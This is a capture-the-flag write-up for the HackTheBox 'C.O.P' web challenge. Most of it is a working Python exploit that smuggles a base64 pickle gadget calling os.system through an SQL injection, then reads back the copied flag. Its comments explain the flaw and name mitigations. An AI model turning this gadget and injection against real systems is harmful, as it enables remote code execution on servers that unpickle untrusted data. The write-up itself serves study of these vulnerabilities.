HackTheBox C.O.P Challenge
https://app.hackthebox.com/challenges/395
Description
The C.O.P (Cult of Pickles) have started up a new web store to sell their merch. We believe that the funds are being used to carry out illicit pickle-based propaganda operations! Investigate the site and try to find a way into their operation!
Exploitation
#!/usr/bin/python3
import requests,pickle,base64,sys,os
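def get_base_url():
    """Build the target's base URL from the single ``ip:port`` CLI argument.

    Returns:
        str: ``http://<host>:<port>``.

    Raises:
        SystemExit: exit status 1 (after printing a usage line) when the
            argument is missing or is not ``host:port`` with a non-empty
            host and a numeric port.
    """
    usage = f"Usage: {sys.argv[0]} <ip:port>"
    if len(sys.argv) != 2:
        print(usage)
        sys.exit(1)
    # rpartition splits on the last ':' so a malformed argument (no colon,
    # empty host or port) is reported as a usage error instead of an
    # unhandled ValueError from tuple unpacking.
    host, sep, port = sys.argv[1].rpartition(':')
    if not sep or not host or not port.isdigit():
        print(usage)
        sys.exit(1)
    return f"http://{host}:{port}"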
class RCE:
    """Pickle gadget: ``__reduce__`` tells pickle to rebuild this object by
    calling ``os.system`` with the module-level string ``payload_command``.

    Nothing runs while the object is pickled; the call happens wherever the
    bytes are later unpickled. This is exactly why ``pickle.loads`` on
    attacker-controlled input amounts to code execution, and why the
    mitigation is to never deserialize untrusted data with pickle (use JSON
    or an authenticated serialization format instead).
    """
    def __reduce__(self):
        # (callable, args) is what pickle records and replays on load.
        return (os.system, (payload_command,))
def create_malicious_pickle():
    """Serialise an ``RCE`` instance and return it URL-safe base64 encoded.

    Returns:
        str: ASCII text using the URL-safe base64 alphabet, so the value can
        be embedded in a URL without further escaping.
    """
    malicious_object = RCE()
    pickled_payload = pickle.dumps(malicious_object)
    # The URL-safe alphabet avoids '+' and '/', which would otherwise need
    # percent-encoding when placed in the request path.
    encoded_payload = base64.urlsafe_b64encode(pickled_payload).decode('ascii')
    return encoded_payload
def inject_payload(encoded_payload):
    """Deliver the payload through the SQL injection under ``TARGET_URL``.

    The request path is ``TARGET_URL`` followed by ``1' UNION SELECT
    '<payload>'-- ``; presumably the application feeds the selected value
    into an unpickler, which is what turns an injection into code execution.
    Only the HTTP status is inspected here, and a 200 does not by itself
    prove the command ran — check_flag_file() is the actual confirmation.

    Args:
        encoded_payload: URL-safe base64 string from create_malicious_pickle().

    Defensive note: a parameterised query removes the UNION, and refusing to
    unpickle database contents removes the code execution even if the
    injection remained.
    """
    injection_url = f"{TARGET_URL}1' UNION SELECT '{encoded_payload}'-- "
    # No timeout is given, so an unresponsive target blocks indefinitely.
    response = requests.get(injection_url)
    if response.status_code == 200:
        print("[+] Payload injected successfully.")
    else:
        print(f"[-] Injection failed with status code: {response.status_code}")
        print("Server response:", response.text)
def check_flag_file():
    """Fetch ``STATIC_FILE_URL`` and print its body when the server returns 200.

    ``payload_command`` copies the flag into the application's static
    directory, so a readable file here is the evidence that the command ran
    on the target (assumes that directory is what the server exposes as
    ``/static/``; the mapping is not shown in this script).
    """
    response = requests.get(STATIC_FILE_URL)
    if response.status_code == 200:
        print("[+] Flag file accessed successfully!")
        # end='' because the file is printed verbatim, trailing newline included.
        print(response.text, end='')
    else:
        print("[-] Could not access the flag file. The exploit may not have worked.")
# Module-level configuration. get_base_url() runs at import time, so importing
# this file without exactly one CLI argument exits with the usage message.
BASE_URL = get_base_url()
TARGET_URL = f"{BASE_URL}/view/"
STATIC_FILE_URL = f"{BASE_URL}/static/flag.txt"
# Command the RCE gadget hands to os.system on the target: it copies the flag
# to a path that is presumably served as /static/flag.txt (see STATIC_FILE_URL).
payload_command = 'cp /app/flag.txt /app/application/static/flag.txt'
if __name__ == "__main__":
    # Build the payload, send it through the injection, then read the flag back.
    encoded_payload = create_malicious_pickle()
    print(f"[+] Generated payload: {encoded_payload}")
    inject_payload(encoded_payload)
    check_flag_file()
Summary
C.O.P: exploit the SQL injection to reach the pickle deserialization, then retrieve the flag.